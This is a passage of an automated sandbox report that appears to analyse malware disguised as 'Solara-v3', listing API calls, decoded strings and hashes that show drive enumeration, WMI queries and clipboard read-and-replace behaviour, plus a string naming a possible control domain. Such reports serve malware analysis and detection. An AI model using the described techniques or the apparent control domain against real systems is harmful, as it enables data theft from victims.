                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CA0507
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00CA0516
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00CA051F
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00CA052C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(00000000,?,00CAE58D), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000,?,?,00000028,00CA8363), ref: 00CAC210
                                                                                                                                                                                                                                              • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00CA5BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00CB0A35
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00CA5BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00CB0A6C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                              • String ID: utf8
                                                                                                                                                                                                                                              • API String ID: 943130320-905460609
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::_Release_chore.LIBCPMT ref: 00C97526
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C97561
                                                                                                                                                                                                                                                • Part of subcall function 00C9AF37: CreateThreadpoolWork.KERNEL32(00C9B060,00C98A2A,00000000,00000000,?,00C98A2A,?,?,?,?), ref: 00C9AF46
                                                                                                                                                                                                                                                • Part of subcall function 00C9AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00C9AF53
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                                                                                                                              • String ID: Fail to schedule the chore!
                                                                                                                                                                                                                                              • API String ID: 3683891980-3313369819
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00CAB893,?,?,00000000,00000000,00000000,?), ref: 00CAB9B7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                              • Opcode ID: f65bfb113ff30c3b714969de0f2a4e980fdf47b3db7a78968be73adf66ecfe18
                                                                                                                                                                                                                                              • Instruction ID: e80d0cf6610c124bb625fe88371f26ab797a988f92c948693c49de585d517636
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f65bfb113ff30c3b714969de0f2a4e980fdf47b3db7a78968be73adf66ecfe18
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50417C7190020AAFCF15DFA4CC81AEEBBB5FF49308F188159F924A7212D3359E50EB51
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C93EC6
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C94002
                                                                                                                                                                                                                                                • Part of subcall function 00C9ABC5: _Yarn.LIBCPMT ref: 00C9ABE5
                                                                                                                                                                                                                                                • Part of subcall function 00C9ABC5: _Yarn.LIBCPMT ref: 00C9AC09
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                                              • API String ID: 2070049627-1405518554
                                                                                                                                                                                                                                              • Opcode ID: 2d94836b698859e84160d5622d8a86a22570ae2c03d8ca7d88826df976bf07a3
                                                                                                                                                                                                                                              • Instruction ID: ae366999bdcb40a1702a43e072b566ec46888b6a879336fde06ac6f3e84d8a84
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d94836b698859e84160d5622d8a86a22570ae2c03d8ca7d88826df976bf07a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D44162F1A007459BEB10DF69D80AB57BBF8BF04714F044628E4499B781E77AE618CBE1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CAB475
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                              • Opcode ID: 31314a6a96ef9c1f8b4b78bdbdc73c17d62e64b2ee579497507bfaedcf581e08
                                                                                                                                                                                                                                              • Instruction ID: b8d88eb3e92f490ed51751adbb3ef6df764c1ebcd3433037fd316e02aa15707c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31314a6a96ef9c1f8b4b78bdbdc73c17d62e64b2ee579497507bfaedcf581e08
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7231E971800217EFCF269F51CC409EA7B66FF0A31DB18465AF86449123C336DEA1EB81
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00C9B8B9
                                                                                                                                                                                                                                              • RaiseException.KERNEL32(?,?,?,?,?), ref: 00C9B8DE
                                                                                                                                                                                                                                                • Part of subcall function 00CA060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C9F354,00000000,?,?,?,00C9F354,00C93D4A,00CC759C,00C93D4A), ref: 00CA066D
                                                                                                                                                                                                                                                • Part of subcall function 00CA8353: IsProcessorFeaturePresent.KERNEL32(00000017,00CA378B,?,?,?,?,00000000,?,?,?,00C9B5AC,00C9B4E0,00000000,?,?,00C9B4E0), ref: 00CA836F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 6ff9c71327f3231840d0a79095fc738612cf4fa7e8348c4b59b41763dd6d68c7
                                                                                                                                                                                                                                              • Instruction ID: 2c8d3b34e75c3408a7a90ce20f8c63a488ac363cbf43403c56cd2b06a4434a9f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ff9c71327f3231840d0a79095fc738612cf4fa7e8348c4b59b41763dd6d68c7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54217F31D0021CFBCF24DF95EA49AEEB7B9AF48710F150419E415AB190CB70AE55DB85
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C92673
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                                                                                                                              • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                              • Opcode ID: 3d1624dfd44db0ca4bb6f0823fbb021a7de18ebadf11507ad7e88686fc773e1e
                                                                                                                                                                                                                                              • Instruction ID: d681f029b47fccf35ee862b4936b741f3b12fdf5de77f81a3796146aa74c0606
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d1624dfd44db0ca4bb6f0823fbb021a7de18ebadf11507ad7e88686fc773e1e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F401BCF1518302ABDB04AF28E846B5A7BE8AF0431CF11892CF46A8B301E375ED04CB81
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CA060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C9F354,00000000,?,?,?,00C9F354,00C93D4A,00CC759C,00C93D4A), ref: 00CA066D
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C92673
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                              • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                              • Opcode ID: 0e69ec1ec002993ecd6df679e9041e344936b1c3367141862c07f00da310e955
                                                                                                                                                                                                                                              • Instruction ID: 0ed3e70b5fcd0cd8eda0fbb1df72430f30941dca63ef91826a6485cba9964c93
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e69ec1ec002993ecd6df679e9041e344936b1c3367141862c07f00da310e955
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4F0F8F1514301ABDB04AF18E846B4BBBE4EB5575CF11881CF5999B300E3B5D844CB92

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:9.7%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:5.5%
                                                                                                                                                                                                                                              Signature Coverage:54.3%
                                                                                                                                                                                                                                              Total number of Nodes:291
                                                                                                                                                                                                                                              Total number of Limit Nodes:21

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 004236A9
                                                                                                                                                                                                                                              • GetLogicalDrives.KERNEL32 ref: 00423996
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DrivesEnvironmentExpandLogicalStrings
                                                                                                                                                                                                                                              • String ID: 9$&Kt0$)mOm$45$<$>>$AQ$Hmkm$PR$Vq$Vq$XH$Ys$\\$_p$bmdm$bo$ef$fmkm$mm$pmrm$rl$wY$|i$|s$\a
                                                                                                                                                                                                                                              • API String ID: 1595903574-2236109924
                                                                                                                                                                                                                                              • Opcode ID: bdc2e361060c2e60b1b8bcc2cdb8b3bfd283e30f55f17195bd23cc72b47b61d2
                                                                                                                                                                                                                                              • Instruction ID: 2fc2160d72e1542a336960e5481f9d0735e9c35b6a9b6e11306a6587d30006f6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdc2e361060c2e60b1b8bcc2cdb8b3bfd283e30f55f17195bd23cc72b47b61d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25A2B7B9D11229DBDB20DF18DC8529EBB71FF95304F1086E9C8596B350E7389A81CF86

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 0h+h$<h7h$ChYh$Ehph$FhFh$HhPh$Kh^h$RhTh$Rhvh$Xh h$^hYh$`h,h$ehdh$fhch$hh(h$lev-tolstoi.com$ohuh$ph8h$shoh$uheh$uhjh$vh}h$xhdh$yhrh
                                                                                                                                                                                                                                              • API String ID: 0-3555453935
                                                                                                                                                                                                                                              • Opcode ID: 6a9fbf59f452024c383559b785281fa2e80acd9a431c8eb1751f95ce11aa3c8a
                                                                                                                                                                                                                                              • Instruction ID: 8753c489787e8cef6e0b2d778e15f4088c0b1d051e6c25f020ec618a161c42f3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a9fbf59f452024c383559b785281fa2e80acd9a431c8eb1751f95ce11aa3c8a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C81F1B190D3D08AD7308F29D98979BBBE1EFC6300F554A6DC1C86B250EB7A0516CB96

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00437E10
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32([d), ref: 00437E93
                                                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437ED1
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(!,.,), ref: 00437F2F
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(B6ABB756), ref: 00437FEF
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0043805E
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004381B1
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32 ref: 004381D4
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 004381DA
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004381EE
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                              • String ID: ,,Y,$C$W;$[d$\
                                                                                                                                                                                                                                              • API String ID: 2485776651-2867424240
                                                                                                                                                                                                                                              • Opcode ID: 44b9128bec2104e14614ee01767a834835cc461376388db997f909470237cd48
                                                                                                                                                                                                                                              • Instruction ID: 3d09bc75159cb0bc0addfeff3c9f402bb7feac1769e375c6bd2c7d3d39127c8e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44b9128bec2104e14614ee01767a834835cc461376388db997f909470237cd48
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD02BA766083009FE710DF65C884B6BBBE5EFC9710F14882EF5959B3A0DB79E8018B56

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000001), ref: 05851032
                                                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 0585103C
                                                                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0585104C
                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0585105D
                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05851090
                                                                                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 058510A0
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32 ref: 058510C1
                                                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 058510CB
                                                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D), ref: 058510D6
                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 058510E3
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 058510ED
                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 058510F3
                                                                                                                                                                                                                                              • GetClipboardSequenceNumber.USER32 ref: 058510F9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3287856425.0000000005851000.00000020.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
• Associated: 00000004.00000002.3287835274.0000000005850000.00000002.00000800.00020000.00000000.sdmp
• Associated: 00000004.00000002.3287877993.0000000005852000.00000002.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_5850000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1416286485-0
                                                                                                                                                                                                                                              • Opcode ID: 215ac403a93b66b026f2148bb99ec8e9f5328c2f4eba65ac35220f1ccde0d729
                                                                                                                                                                                                                                              • Instruction ID: ee2e451a42db64526e29257a1585c308ebfe48aa3adef009613bda1b9f8dddd6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 215ac403a93b66b026f2148bb99ec8e9f5328c2f4eba65ac35220f1ccde0d729
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C02186396143509BDB202B75AC0EBAABBA8FF04765F040578FE87D6160EF25AC10C7A1

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL ref: 004104C9
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL ref: 004105C0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: $$<.$X@$f@$i
                                                                                                                                                                                                                                              • API String ID: 237503144-92190101
                                                                                                                                                                                                                                              • Opcode ID: 173b7ab53e4ef546a75e85442e8143dd99584801225795e8cb45284878ed8cf0
                                                                                                                                                                                                                                              • Instruction ID: 5d4d46c9a90ffb503717a27f7093fefa0dd82dfd25ea639eba7b9214d4ffac56
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 173b7ab53e4ef546a75e85442e8143dd99584801225795e8cb45284878ed8cf0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96528472A1C7508BC3649F39C4813EEB7E1AF85320F154A2EE8E9973D1D67899818B47
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: &8$`
                                                                                                                                                                                                                                              • API String ID: 0-842996520
                                                                                                                                                                                                                                              • Opcode ID: 04d55245a6d6fe8c9061ae8d234f7c10597bb42f531ccff2a359901277746420
                                                                                                                                                                                                                                              • Instruction ID: e733c91b1712801f5584cc40fcd09b41f9830b0468eb1d5c922baaacae7725df
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04d55245a6d6fe8c9061ae8d234f7c10597bb42f531ccff2a359901277746420
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0213D3B6D042148BDB14DF78C9413DEBBF1AF45310F1586AED859AB391E7388D81CB8A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 1085 43328c-43336d call 413cd0 GetSystemMetrics * 2 1093 433374-433405 1085->1093
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                              • Opcode ID: be52f64dafac1e5ff9b8b3963e09f4bf9d8351297948cd5fcb18972580f21498
                                                                                                                                                                                                                                              • Instruction ID: d4d7d992982323047ebfbe64a21f998e07ffa76df3b32112bcb1f2418617eae3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be52f64dafac1e5ff9b8b3963e09f4bf9d8351297948cd5fcb18972580f21498
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB51A3B4E142089FCB40EFACD985A9EBBF0BF48310F10852AE498E7350D774A945CF96

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
